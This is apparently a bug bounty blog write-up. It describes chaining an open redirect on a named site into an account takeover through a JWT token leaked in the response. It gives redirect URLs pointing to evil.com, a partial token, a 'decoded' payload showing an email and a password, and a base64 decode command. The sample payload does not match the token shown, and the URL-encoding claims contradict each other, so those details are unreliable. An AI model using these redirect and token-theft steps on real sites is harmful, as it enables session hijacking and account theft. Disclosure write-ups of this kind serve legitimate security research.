Open Redirect → Response JWT Token Leakage → Full Account Takeover (ATO) 🚨⚠️

From Open Redirect to Account Takeover (ATO) ➟ How a Small Bug Turned Critical ⚡

In bug bounty hunting, not every bug looks valuable at first. Sometimes, what appears to be a "low severity" issue can actually become a critical chain when tested deeper. 💰💥

Recently, I came across an Open Redirect vulnerability. Normally, this is not considered a big deal. However, as I dug deeper, I discovered something shocking: the server was Leaking a JWT Token in the response. This combination allowed me to go from a harmless-looking bug to a Full Account Takeover (ATO). In this blog, I’ll show exactly how I escalated a seemingly small bug into a full account takeover. 👨‍💻🤔

Here’s the full story 👇

🪝 Step 1 ➟ Finding the Open Redirect

The target endpoint looked like this:

• https://pixellabgeeks.com/auth-redirect?redirect_url=https%3A%2F%2Fsub.pixellabgeeks.com%2Flogin

👉 When I modified the redirect_url=, I was able to redirect users to external domains.

✅ Works with proper URL encoding:

• https://pixellabgeeks.com/auth-redirect?redirect_url=https%3A%2F%2Fevil.com  

❌ Fails without encoding:

• https://pixellabgeeks.com/auth-redirect?redirect_url=https://evil.com

▶️ This confirmed an Open Redirect vulnerability. At this stage, it looked like a "low severity" bug.

💡 Pro Tip for Bug Hunters

Never stop at the first bug you find. Even a "low" issue like Open Redirect can escalate into a critical finding if you test deeper. 🔍

🔍 Vulnerability Details:

🔗 Endpoints Tested:

• https://pixellabgeeks.com/auth-redirect_url=https%3A%2F%2Fsub.pixellabgeeks.com%2Flogin
• https://pixellabgeeks.com/auth-redirect?redirect_url=https%3A%2F%2Fevil.com

✅ Encoding Reference:

• %3A → :
• %2F%2F → //
• %2F → /

⚠️ Note ↴

Direct usage of : instead of %3A was not working due to restrictions. Proper URL encoding was required.

❌ Without Encoding ↴

• https://pixellabgeeks.com/auth-redirect?redirect_url=https://evil.com

✅ Confirmed:

• Open Redirect to attacker-controlled domains (e.g., evil.com)
• Server response leaking JWT tokens

🛠 Step 2 ➟ Inspecting the Response (BurpSuite)

Using BurpSuite, I:

• Captured the request 🚨
• Logged request/response 🛡️
• Replayed in Repeater (confirmed consistent redirection) 🔁
• Inspected response (found hidden JWT token starting with ey...) 🔍

⚔️ Proof of Concept (PoC)

▶️ PoC URL:

🔗 Original URL:

• https://pixellabgeeks.com/auth-redirect?redirect_url=https://sub.pixellabgeeks.com/login

🔗 Attacker Controlled Domain:

• https://pixellabgeeks.com/auth-redirect?redirect_url=https://evil.com

▶️ Observed Response:

• .......<input type="hidden" name="token" value="eyJhbGciOiJSUzI1NiIsImtpZCI6Ijg1MjliZWYzMGU1MWMwNjY4MDhmYWUwMmM1MDRmZTY1MTU0NGFiMjQ0ZDY0NTQ3YjE3MGUxZjA4Y2U0ODMwOTAifQ.eyJhY3IiOiJ1cm46bWFjZTppbmNvbW1vbjppYXA6YnJvbnplIiwiYW1yIjoicHdkIiwiYXVkIjoiY2l2by1hcGktZ28tc2VydmljZSIsImF1dGhfdGltZSI6MTc1NjU3MTEwNCwiZXhwIjoxNzU2NjU3NTA0LCJncmFudF90eXBlIjoiYXV0aG9yaXphdGlvbl9jb2XXXXXXX">.......

🔓 Decoded JWT (Example):

{

  "email": "sevenx@pixellabgeeks.com",

  "pwd": "SEVENx@_007x",

  "user_id": "XXXXXXX",

  "aud": "cXXXXXXX",

  "iss": "https://pixellabgeeks.com",

  "exp": 175XXXXX7504,

  "iat": 175XXXXX1104,

  "auth_time": 175XXXXX04

}

🔓 Step 3 ➟ Decoding the JWT Token

👨‍💻 Base64 JWT Decode (Linux Command):

Base64 JWT Decode - PixelLabGeeks.com

echo "PASTE_YOUR_JWT_TOKEN_HERE" | cut -d "." -f2 | base64 -d

Inside the decoded payload, I found:

• Email addresses 📧
• Authentication details 🔑
• Session information 📂
• Expiry timestamps ⏳

This meant the leaked JWT could be used to hijack user sessions.

⚡ Step 4 ➟ Chaining the Attack

Here’s how the chain looked:

1. Open Redirect → Redirect user to attacker’s domain
2. Response Leak → Server exposes JWT token
3. Decode Token → Attacker extracts sensitive data
4. Hijack Session → Attacker logs in as victim

• 🎯 Final Result: Full Account Takeover (ATO) 🚨

💥 Step 5 ➟ Impact

The combined vulnerability had a critical impact:

• Full Account Takeover 🔓
• Session Hijacking 🕵️
• Authentication Bypass 🚪
• Data Exposure 📂

• 📌 Severity: Critical (CVSS ~9.8)

🏆 Key Takeaway

A low-severity bug can become a critical chain if you test deeper. Always test beyond the obvious. 🚀

🎁 TOOL PROMPT ↴

"Write me a Python script that decodes JWT tokens. The token always starts with ey.... The output should be displayed in JSON format with a hacker-style terminal color scheme (Green, Red, Blue). The tool should take the JWT token as input and automatically decode the header and payload. The signature should be displayed only in raw Base64 format. Add an arrow (👉) before each section to make the output look stylish."

🔄 Final Note ↴

• Accept: Duplicate 🥺

Not every bug gets a bounty, but every bug teaches a lesson. 💡 Today’s duplicate is tomorrow’s unique find. Keep hunting, keep learning! 🔥

Duplicate Today, New Skills Tomorrow 🚀✨

#BugBounty #CyberSecurity #EthicalHacking #SEVENxOFFICIAL #PLG

WhatsApp Channel Join Now

Facebook Page Join Now

Telegram Channel Join Now

YouTube Channel Subscribe Now

LinkedIn Account Connect Now

Online Store Shop Now

Social Media Links Visit Now